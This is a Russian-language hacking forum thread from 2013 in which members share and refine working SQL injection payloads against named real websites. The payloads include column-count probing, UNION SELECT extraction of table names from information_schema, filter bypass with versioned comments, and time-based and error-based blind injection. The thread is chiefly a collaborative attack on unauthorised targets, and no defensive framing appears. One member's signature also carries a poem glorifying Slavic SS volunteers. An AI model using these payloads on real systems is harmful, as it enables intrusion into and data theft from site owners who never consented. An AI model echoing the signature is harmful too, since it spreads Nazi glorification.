HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 01.09.2013, 21:20
Unknowhacker
Guest
Сообщений: n/a
Провел на форуме:
94006

Репутация: 24
По умолчанию

Интересная SQL

Код:
Code:
seafarer.od.ua/?page=study&course=2+order+by+7+--+
Но при операторах UNION+SELECT выдаёт ошибку будто кол-во столбцов неверно.
 
Ответить с цитированием

  #2  
Старый 02.09.2013, 04:44
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию

Цитата:
Сообщение от Unknowhacker  
Unknowhacker said:
Интересная SQL
Код:
Code:
seafarer.od.ua/?page=study&course=2+order+by+7+--+
Но при операторах
UNION+SELECT
выдаёт ошибку будто кол-во столбцов неверно.
Warning: ibase_query(): Dynamic SQL Error SQL error code = -104 Token unknown - line 1, column 103 group in /var/www/lesozavodsk/study.inc on line 11

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//seafarer.od.ua/?page=study&course=2+union+select+1,2,3,4,5,6,7+from+rdb$relations+--+

[/COLOR][/COLOR
 
Ответить с цитированием

  #3  
Старый 03.09.2013, 11:24
Unknowhacker
Guest
Сообщений: n/a
Провел на форуме:
94006

Репутация: 24
По умолчанию

нужно обойти фильтр не понятно на что, толи TABLE_NAME; INFORMATION_SCHEMA

Код:
Code:
http://www.web-compas.ru/c.php?id=-34%27+union+/*!select*/+1,version%28%29,3,4,5,6,7+--+
на select вроде обошёл
 
Ответить с цитированием

  #4  
Старый 03.09.2013, 12:02
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию

Цитата:
Сообщение от Unknowhacker  
Unknowhacker said:
нужно обойти фильтр не понятно на что, толи TABLE_NAME; INFORMATION_SCHEMA
Код:
Code:
http://www.web-compas.ru/c.php?id=-34%27+union+/*!select*/+1,version%28%29,3,4,5,6,7+--+
на select вроде обошёл
Мысль у тебя правильная:

Цитата:
Сообщение от None  
http://www.web-compas.ru/c.php?id=-34'+union+/*!select*/+1,/*!group_concat(table_name)*/,3,4,5,6,7
+/*!from*/+/*!information_schema.tables*/+/*!where*/+/*!table_schema*/ = /*!database()*/+--+
 
Ответить с цитированием

  #5  
Старый 03.09.2013, 12:55
Unknowhacker
Guest
Сообщений: n/a
Провел на форуме:
94006

Репутация: 24
По умолчанию

Цитата:
Сообщение от YaBtr  
YaBtr said:
Мысль у тебя правильная:
Точно, мне показалось, что дальше не прокатит ..

Я вот ещё нашёл

Код:
Code:
http://tochka.cn.ua/index.php?cat=0%27+order+by+9+--+
http://www.autoonline.com.ua/news/index.php?id=4736+order+by+9+--+
но при UNION+SELECT = показывает обычную страницу даже есть кол-во столбцов я увеличу.
 
Ответить с цитированием

  #6  
Старый 03.09.2013, 15:12
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию

Цитата:
Сообщение от Unknowhacker  
Unknowhacker said:
Точно, мне показалось, что дальше не прокатит ..
Я вот ещё нашёл
Код:
Code:
http://tochka.cn.ua/index.php?cat=0%27+order+by+9+--+
http://www.autoonline.com.ua/news/index.php?id=4736+order+by+9+--+
но при UNION+SELECT = показывает обычную страницу даже есть кол-во столбцов я увеличу.
Здесьtime based

http://www.autoonline.com.ua/news/index.php?id=4736+/*!and*/+/*!if(substr(version(),1,1)=5,SLEEP(5),1)*/+--+
 
Ответить с цитированием

  #7  
Старый 03.09.2013, 16:33
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

Цитата:
Сообщение от YaBtr  
YaBtr said:
Здесь
time based
http://www.autoonline.com.ua/news/index.php?id=4736
+/*!and*/+/*!if(substr(version(),1,1)=5,SLEEP(5),1)*/+--+
мммм,зачем тайм..

Цитата:
Сообщение от None  
http://www.autoonline.com.ua/news/index.php?id=-4736/**/UNION/**//*!SELECT*//**/1,2,version%28%29,4,5,6,7,8,9%23
Цитата:
Сообщение от None  
http://www.autoonline.com.ua/news/index.php?id=-4736/**/UNION/**//*!SELECT*//**/1,2,/*!table_name*/,4,5,6,7,8,9/**//*!from*//**/information_schema.tables/**/limit/**/N,1%23
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
 
Ответить с цитированием

  #8  
Старый 03.09.2013, 22:15
Unknowhacker
Guest
Сообщений: n/a
Провел на форуме:
94006

Репутация: 24
По умолчанию

HATA4OK, спасибо, но я уже сделал по другому.

Код:
Code:
http://www.cigarettehouse.net/?action=page&name=NEWS&page=-37+/*!union*/+/*!select*/+1,2+--+
Мне не даёт покоя эта ссылка, но как я не крутил не выводится номер столбца -(
 
Ответить с цитированием

  #9  
Старый 04.09.2013, 10:06
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от Unknowhacker  
Unknowhacker said:
HATA4OK
, спасибо, но я уже сделал по другому.
Код:
Code:
http://www.cigarettehouse.net/?action=page&name=NEWS&page=-37+/*!union*/+/*!select*/+1,2+--+
Мне не даёт покоя эта ссылка, но как я не крутил не выводится номер столбца -(
И не выведешь. Тут слепая скуля.

Кстати тут удобно использовать метод more1row

Смотри сам:

Код:
Code:
http://www.cigarettehouse.net/?action=page&name=NEWS&page=37+and+if(substr((@@version),1,1)=4,1,(select+1+union+select+2))

No error

http://www.cigarettehouse.net/?action=page&name=NEWS&page=37+and+if(substr((@@version),1,1)=5,1,(select+1+union+select+2))

Error
 
Ответить с цитированием

  #10  
Старый 04.09.2013, 14:17
Unknowhacker
Guest
Сообщений: n/a
Провел на форуме:
94006

Репутация: 24
По умолчанию

Цитата:
Сообщение от BigBear  
BigBear said:
И не выведешь. Тут слепая скуля.
Кстати тут удобно использовать метод
more1row
Смотри сам:
Код:
Code:
http://www.cigarettehouse.net/?action=page&name=NEWS&page=37+and+if(substr((@@version),1,1)=4,1,(select+1+union+select+2))

No error

http://www.cigarettehouse.net/?action=page&name=NEWS&page=37+and+if(substr((@@version),1,1)=5,1,(select+1+union+select+2))

Error
А тем более с четвёрки не вытащишь -(

Кто может сказать, что за реагирование на *1

Код:
Code:
http://pereprava.com.ua/index.php?id=1*1
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ